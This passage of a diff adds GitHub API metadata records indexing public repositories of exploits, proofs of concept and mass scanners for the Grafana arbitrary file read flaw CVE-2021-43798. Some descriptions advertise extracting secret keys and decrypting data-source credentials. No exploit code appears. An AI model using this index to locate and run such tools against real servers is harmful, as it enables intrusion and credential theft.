+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94842031?v=4",
+ "html_url": "https:\/\/github.com\/A-D-Team"
+ },
+ "html_url": "https:\/\/github.com\/A-D-Team\/grafanaExp",
+ "description": "A exploit tool for Grafana Unauthorized arbitrary file reading vulnerability (CVE-2021-43798), it can burst plugins \/ extract secret_key \/ decrypt data_source info automatic.",
+ "fork": false,
+ "created_at": "2021-12-07T15:11:34Z",
+ "updated_at": "2024-06-19T02:25:28Z",
+ "pushed_at": "2024-03-28T08:46:27Z",
+ "stargazers_count": 241,
+ "watchers_count": 241,
+ "has_discussions": false,
+ "forks_count": 36,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-43798",
+ "exploit",
+ "grafana"
+ ],
+ "visibility": "public",
+ "forks": 36,
+ "watchers": 241,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 435955349,
+ "name": "grafanaExp",
+ "full_name": "kenuosec\/grafanaExp",
+ "owner": {
+ "login": "kenuosec",
+ "id": 77450225,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77450225?v=4",
+ "html_url": "https:\/\/github.com\/kenuosec"
+ },
+ "html_url": "https:\/\/github.com\/kenuosec\/grafanaExp",
+ "description": "利用grafan CVE-2021-43798任意文件读漏洞,自动探测是否有漏洞、存在的plugin、提取密钥、解密server端db文件,并输出data_sourrce信息。",
+ "fork": false,
+ "created_at": "2021-12-07T16:39:09Z",
+ "updated_at": "2023-12-27T07:46:41Z",
+ "pushed_at": "2021-12-07T15:57:04Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 436106864,
+ "name": "CVE-2021-43798-grafana_fileread",
+ "full_name": "M0ge\/CVE-2021-43798-grafana_fileread",
+ "owner": {
+ "login": "M0ge",
+ "id": 62680449,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62680449?v=4",
+ "html_url": "https:\/\/github.com\/M0ge"
+ },
+ "html_url": "https:\/\/github.com\/M0ge\/CVE-2021-43798-grafana_fileread",
+ "description": "grafana CVE-2021-43798任意文件读取漏洞POC,采用多插件轮训检测的方法,允许指定单URL和从文件中读取URL",
+ "fork": false,
+ "created_at": "2021-12-08T03:43:31Z",
+ "updated_at": "2023-05-22T09:15:44Z",
+ "pushed_at": "2022-01-27T08:35:29Z",
+ "stargazers_count": 17,
+ "watchers_count": 17,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 17,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 436149953,
+ "name": "Grafana-CVE-2021-43798",
+ "full_name": "JiuBanSec\/Grafana-CVE-2021-43798",
+ "owner": {
+ "login": "JiuBanSec",
+ "id": 57030243,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57030243?v=4",
+ "html_url": "https:\/\/github.com\/JiuBanSec"
+ },
+ "html_url": "https:\/\/github.com\/JiuBanSec\/Grafana-CVE-2021-43798",
+ "description": "Grafana File-Read Vuln",
+ "fork": false,
+ "created_at": "2021-12-08T07:06:58Z",
+ "updated_at": "2021-12-13T11:43:48Z",
+ "pushed_at": "2021-12-13T11:52:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 436150384,
+ "name": "CVE-2021-43798-Grafana-File-Read",
+ "full_name": "lfz97\/CVE-2021-43798-Grafana-File-Read",
+ "owner": {
+ "login": "lfz97",
+ "id": 75104414,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75104414?v=4",
+ "html_url": "https:\/\/github.com\/lfz97"
+ },
+ "html_url": "https:\/\/github.com\/lfz97\/CVE-2021-43798-Grafana-File-Read",
+ "description": "CVE-2021-43798-Grafana任意文件读取漏洞",
+ "fork": false,
+ "created_at": "2021-12-08T07:08:37Z",
+ "updated_at": "2022-09-22T13:45:23Z",
+ "pushed_at": "2021-12-09T02:13:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 436272467,
+ "name": "CVE-2021-43798",
+ "full_name": "s1gh\/CVE-2021-43798",
+ "owner": {
+ "login": "s1gh",
+ "id": 699943,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/699943?v=4",
+ "html_url": "https:\/\/github.com\/s1gh"
+ },
+ "html_url": "https:\/\/github.com\/s1gh\/CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-08T14:14:38Z",
+ "updated_at": "2022-11-16T06:58:34Z",
+ "pushed_at": "2021-12-15T18:56:19Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 436562240,
+ "name": "CVE-2021-43798",
+ "full_name": "z3n70\/CVE-2021-43798",
+ "owner": {
+ "login": "z3n70",
+ "id": 39817707,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39817707?v=4",
+ "html_url": "https:\/\/github.com\/z3n70"
+ },
+ "html_url": "https:\/\/github.com\/z3n70\/CVE-2021-43798",
+ "description": "Simple program for exploit grafana",
+ "fork": false,
+ "created_at": "2021-12-09T09:48:40Z",
+ "updated_at": "2023-09-28T11:33:53Z",
+ "pushed_at": "2021-12-09T10:10:25Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "bugbounty",
+ "cybersecurity",
+ "exploit",
+ "grafana",
+ "pentesting"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 436563698,
+ "name": "Grafana_POC-CVE-2021-43798",
+ "full_name": "Mo0ns\/Grafana_POC-CVE-2021-43798",
+ "owner": {
+ "login": "Mo0ns",
+ "id": 62552076,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62552076?v=4",
+ "html_url": "https:\/\/github.com\/Mo0ns"
+ },
+ "html_url": "https:\/\/github.com\/Mo0ns\/Grafana_POC-CVE-2021-43798",
+ "description": "Grafana-POC任意文件读取漏洞(CVE-2021-43798)",
+ "fork": false,
+ "created_at": "2021-12-09T09:53:25Z",
+ "updated_at": "2023-10-20T03:51:14Z",
+ "pushed_at": "2021-12-09T09:56:29Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 436590562,
+ "name": "Grafana-CVE-2021-43798Exp",
+ "full_name": "fanygit\/Grafana-CVE-2021-43798Exp",
+ "owner": {
+ "login": "fanygit",
+ "id": 42337082,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42337082?v=4",
+ "html_url": "https:\/\/github.com\/fanygit"
+ },
+ "html_url": "https:\/\/github.com\/fanygit\/Grafana-CVE-2021-43798Exp",
+ "description": "CVE-2021-43798Exp多线程批量验证脚本",
+ "fork": false,
+ "created_at": "2021-12-09T11:25:47Z",
+ "updated_at": "2021-12-16T03:37:48Z",
+ "pushed_at": "2021-12-16T03:37:46Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 437331756,
+ "name": "CVE-2021-43798",
+ "full_name": "LongWayHomie\/CVE-2021-43798",
+ "owner": {
+ "login": "LongWayHomie",
+ "id": 63229183,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63229183?v=4",
+ "html_url": "https:\/\/github.com\/LongWayHomie"
+ },
+ "html_url": "https:\/\/github.com\/LongWayHomie\/CVE-2021-43798",
+ "description": "CVE-2021-43798 is a vulnerability marked as High priority (CVSS 7.5) leading to arbitrary file read via installed plugins in Grafana application.",
+ "fork": false,
+ "created_at": "2021-12-11T16:24:58Z",
+ "updated_at": "2022-03-01T12:41:16Z",
+ "pushed_at": "2021-12-22T00:25:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437363274,
+ "name": "exploit-grafana-CVE-2021-43798",
+ "full_name": "pedrohavay\/exploit-grafana-CVE-2021-43798",
+ "owner": {
+ "login": "pedrohavay",
+ "id": 18234370,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18234370?v=4",
+ "html_url": "https:\/\/github.com\/pedrohavay"
+ },
+ "html_url": "https:\/\/github.com\/pedrohavay\/exploit-grafana-CVE-2021-43798",
+ "description": "This is a proof-of-concept exploit for Grafana's Unauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).",
+ "fork": false,
+ "created_at": "2021-12-11T18:49:30Z",
+ "updated_at": "2024-06-24T03:12:02Z",
+ "pushed_at": "2021-12-11T19:10:03Z",
+ "stargazers_count": 36,
+ "watchers_count": 36,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 36,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 437579874,
+ "name": "CVE-2021-43798",
+ "full_name": "gixxyboy\/CVE-2021-43798",
+ "owner": {
+ "login": "gixxyboy",
+ "id": 43948762,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43948762?v=4",
+ "html_url": "https:\/\/github.com\/gixxyboy"
+ },
+ "html_url": "https:\/\/github.com\/gixxyboy\/CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-12T15:16:55Z",
+ "updated_at": "2021-12-12T15:16:59Z",
+ "pushed_at": "2021-12-12T15:16:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438335194,
+ "name": "CVE-2021-43798",
+ "full_name": "Ryze-T\/CVE-2021-43798",
+ "owner": {
+ "login": "Ryze-T",
+ "id": 76553352,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76553352?v=4",
+ "html_url": "https:\/\/github.com\/Ryze-T"
+ },
+ "html_url": "https:\/\/github.com\/Ryze-T\/CVE-2021-43798",
+ "description": "Grafana8.x 任意文件读取",
+ "fork": false,
+ "created_at": "2021-12-14T17:05:41Z",
+ "updated_at": "2024-05-15T02:03:20Z",
+ "pushed_at": "2021-12-15T02:53:54Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 439241226,
+ "name": "CVE-2021-43798-Grafana",
+ "full_name": "k3rwin\/CVE-2021-43798-Grafana",
+ "owner": {
+ "login": "k3rwin",
+ "id": 59213152,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59213152?v=4",
+ "html_url": "https:\/\/github.com\/k3rwin"
+ },
+ "html_url": "https:\/\/github.com\/k3rwin\/CVE-2021-43798-Grafana",
+ "description": "CVE-2021-43798 Grafana任意文件读取",
+ "fork": false,
+ "created_at": "2021-12-17T07:03:32Z",
+ "updated_at": "2022-03-13T10:04:41Z",
+ "pushed_at": "2022-03-16T04:33:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440470889,
+ "name": "CVE-2021-43798",
+ "full_name": "gps1949\/CVE-2021-43798",
+ "owner": {
+ "login": "gps1949",
+ "id": 62601891,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62601891?v=4",
+ "html_url": "https:\/\/github.com\/gps1949"
+ },
+ "html_url": "https:\/\/github.com\/gps1949\/CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-21T10:04:41Z",
+ "updated_at": "2021-12-21T10:09:58Z",
+ "pushed_at": "2021-12-21T10:09:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 440638073,
+ "name": "grafana-CVE-2021-43798",
+ "full_name": "halencarjunior\/grafana-CVE-2021-43798",
+ "owner": {
+ "login": "halencarjunior",
+ "id": 403088,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/403088?v=4",
+ "html_url": "https:\/\/github.com\/halencarjunior"
+ },
+ "html_url": "https:\/\/github.com\/halencarjunior\/grafana-CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-21T20:08:22Z",
+ "updated_at": "2021-12-21T23:41:01Z",
+ "pushed_at": "2021-12-21T23:40:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 445007761,
+ "name": "CVE-2021-43798",
+ "full_name": "light-Life\/CVE-2021-43798",
+ "owner": {
+ "login": "light-Life",
+ "id": 53685855,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53685855?v=4",
+ "html_url": "https:\/\/github.com\/light-Life"
+ },
+ "html_url": "https:\/\/github.com\/light-Life\/CVE-2021-43798",
+ "description": "运用golang写的grafana批量验证脚本,内置48个验证",
+ "fork": false,
+ "created_at": "2022-01-06T01:54:26Z",
+ "updated_at": "2022-08-15T15:41:35Z",
+ "pushed_at": "2022-01-11T08:12:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 445112055,
+ "name": "CVE-2021-43798-poc",
+ "full_name": "rnsss\/CVE-2021-43798-poc",
+ "owner": {
+ "login": "rnsss",
+ "id": 48343279,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48343279?v=4",
+ "html_url": "https:\/\/github.com\/rnsss"
+ },
+ "html_url": "https:\/\/github.com\/rnsss\/CVE-2021-43798-poc",
+ "description": "Grafana8.x 任意文件读取",
+ "fork": false,
+ "created_at": "2022-01-06T09:25:35Z",
+ "updated_at": "2022-01-07T03:09:48Z",
+ "pushed_at": "2022-01-07T03:09:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 445709435,
+ "name": "CVE-2021-43798-mass_scanner",
+ "full_name": "rodpwn\/CVE-2021-43798-mass_scanner",
+ "owner": {
+ "login": "rodpwn",
+ "id": 95486831,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95486831?v=4",
+ "html_url": "https:\/\/github.com\/rodpwn"
+ },
+ "html_url": "https:\/\/github.com\/rodpwn\/CVE-2021-43798-mass_scanner",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-08T02:58:18Z",
+ "updated_at": "2022-07-14T10:43:16Z",
+ "pushed_at": "2022-01-11T01:28:59Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 449447091,
+ "name": "CVE-2021-43798_exploit",
+ "full_name": "aymenbouferroum\/CVE-2021-43798_exploit",
+ "owner": {
+ "login": "aymenbouferroum",
+ "id": 63649732,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63649732?v=4",
+ "html_url": "https:\/\/github.com\/aymenbouferroum"
+ },
+ "html_url": "https:\/\/github.com\/aymenbouferroum\/CVE-2021-43798_exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-18T21:04:39Z",
+ "updated_at": "2022-01-18T21:05:05Z",
+ "pushed_at": "2022-01-22T22:15:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 463472397,
+ "name": "GrafanaDirInclusion",
+ "full_name": "Jroo1053\/GrafanaDirInclusion",
+ "owner": {
+ "login": "Jroo1053",
+ "id": 38885991,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38885991?v=4",
+ "html_url": "https:\/\/github.com\/Jroo1053"
+ },
+ "html_url": "https:\/\/github.com\/Jroo1053\/GrafanaDirInclusion",
+ "description": "Script to demonstrate the Grafana directory traversal exploit (CVE-2021-43798).",
+ "fork": false,
+ "created_at": "2022-02-25T09:26:40Z",
+ "updated_at": "2022-09-27T15:55:16Z",
+ "pushed_at": "2022-09-13T14:20:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 465654847,
+ "name": "grafana-cve-2021-43798",
+ "full_name": "yasindce1998\/grafana-cve-2021-43798",
+ "owner": {
+ "login": "yasindce1998",
+ "id": 36514300,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36514300?v=4",
+ "html_url": "https:\/\/github.com\/yasindce1998"
+ },
+ "html_url": "https:\/\/github.com\/yasindce1998\/grafana-cve-2021-43798",
+ "description": "This repository contains files for reproducing the vulnerability.",
+ "fork": false,
+ "created_at": "2022-03-03T09:37:46Z",
+ "updated_at": "2023-12-06T11:05:55Z",
+ "pushed_at": "2022-03-03T09:42:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 475197658,
+ "name": "CVE-2021-43798-Grafana-File-Read",
+ "full_name": "BJLIYANLIANG\/CVE-2021-43798-Grafana-File-Read",
+ "owner": {
+ "login": "BJLIYANLIANG",
+ "id": 34064679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34064679?v=4",
+ "html_url": "https:\/\/github.com\/BJLIYANLIANG"
+ },
+ "html_url": "https:\/\/github.com\/BJLIYANLIANG\/CVE-2021-43798-Grafana-File-Read",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-28T22:23:34Z",
+ "updated_at": "2022-03-04T03:10:30Z",
+ "pushed_at": "2021-12-11T08:35:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 499301850,
+ "name": "CVE-2021-43798",
+ "full_name": "lalkaltest\/CVE-2021-43798",
+ "owner": {
+ "login": "lalkaltest",
+ "id": 23642499,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23642499?v=4",
+ "html_url": "https:\/\/github.com\/lalkaltest"
+ },
+ "html_url": "https:\/\/github.com\/lalkaltest\/CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-06-02T21:55:28Z",
+ "updated_at": "2022-12-15T10:25:38Z",
+ "pushed_at": "2021-12-09T12:34:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 547929236,
+ "name": "CVE-2021-43798",
+ "full_name": "hupe1980\/CVE-2021-43798",
+ "owner": {
+ "login": "hupe1980",
+ "id": 24973437,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24973437?v=4",
+ "html_url": "https:\/\/github.com\/hupe1980"
+ },
+ "html_url": "https:\/\/github.com\/hupe1980\/CVE-2021-43798",
+ "description": "Grafana - Directory Traversal and Arbitrary File Read",
+ "fork": false,
+ "created_at": "2022-10-08T15:31:19Z",
+ "updated_at": "2023-04-24T23:10:49Z",
+ "pushed_at": "2022-10-08T16:31:01Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-43798",
+ "grafana"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 586744953,
+ "name": "CVE-2021-43798",
+ "full_name": "G01d3nW01f\/CVE-2021-43798",
+ "owner": {
+ "login": "G01d3nW01f",
+ "id": 75846902,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4",
+ "html_url": "https:\/\/github.com\/G01d3nW01f"
+ },
+ "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-09T05:53:30Z",
+ "updated_at": "2023-01-11T14:55:38Z",
+ "pushed_at": "2023-01-09T06:00:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 594377929,
+ "name": "LabAutomationCVE-2021-43798",
+ "full_name": "mauricelambert\/LabAutomationCVE-2021-43798",
+ "owner": {
+ "login": "mauricelambert",
+ "id": 50479118,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4",
+ "html_url": "https:\/\/github.com\/mauricelambert"
+ },
+ "html_url": "https:\/\/github.com\/mauricelambert\/LabAutomationCVE-2021-43798",
+ "description": "This script implements a lab automation where I exploit CVE-2021-43798 to steal user secrets and then gain privileges on a Linux system.",
+ "fork": false,
+ "created_at": "2023-01-28T11:12:22Z",
+ "updated_at": "2023-01-29T20:01:43Z",
+ "pushed_at": "2023-01-28T11:24:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "automation",
+ "cve-2021-43798",
+ "exploit",
+ "hacking",
+ "lab",
+ "methodology",
+ "pentest",
+ "privilege-escalation",
+ "secrets"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 639713771,
+ "name": "GrafanaDirectoryScanner",
+ "full_name": "FAOG99\/GrafanaDirectoryScanner",
+ "owner": {
+ "login": "FAOG99",
+ "id": 92898049,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92898049?v=4",
+ "html_url": "https:\/\/github.com\/FAOG99"
+ },
+ "html_url": "https:\/\/github.com\/FAOG99\/GrafanaDirectoryScanner",
+ "description": "Exploit for grafana CVE-2021-43798",
+ "fork": false,
+ "created_at": "2023-05-12T04:10:09Z",
+ "updated_at": "2023-05-15T02:37:14Z",
+ "pushed_at": "2023-05-12T17:37:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 668115938,
+ "name": "CVE-2021-43798",
+ "full_name": "nuker\/CVE-2021-43798",
+ "owner": {
+ "login": "nuker",
+ "id": 104190762,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104190762?v=4",
+ "html_url": "https:\/\/github.com\/nuker"
+ },
+ "html_url": "https:\/\/github.com\/nuker\/CVE-2021-43798",
+ "description": "POC for CVE-2021-43798 written in python",
+ "fork": false,
+ "created_at": "2023-07-19T04:16:39Z",
+ "updated_at": "2023-07-19T04:29:26Z",
+ "pushed_at": "2023-07-19T04:40:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 686520503,
+ "name": "grafana-exploit-CVE-2021-43798",
+ "full_name": "victorhorowitz\/grafana-exploit-CVE-2021-43798",
+ "owner": {
+ "login": "victorhorowitz",
+ "id": 110938606,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110938606?v=4",
+ "html_url": "https:\/\/github.com\/victorhorowitz"
+ },
+ "html_url": "https:\/\/github.com\/victorhorowitz\/grafana-exploit-CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-03T04:11:39Z",
+ "updated_at": "2023-09-03T04:56:01Z",
+ "pushed_at": "2023-09-03T04:59:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 710352369,
+ "name": "CVE-2021-43798",
+ "full_name": "katseyres2\/CVE-2021-43798",
+ "owner": {
+ "login": "katseyres2",
+ "id": 143514320,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143514320?v=4",
+ "html_url": "https:\/\/github.com\/katseyres2"
+ },
+ "html_url": "https:\/\/github.com\/katseyres2\/CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-26T14:21:49Z",
+ "updated_at": "2023-10-26T14:23:31Z",
+ "pushed_at": "2023-10-26T14:23:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 721589713,
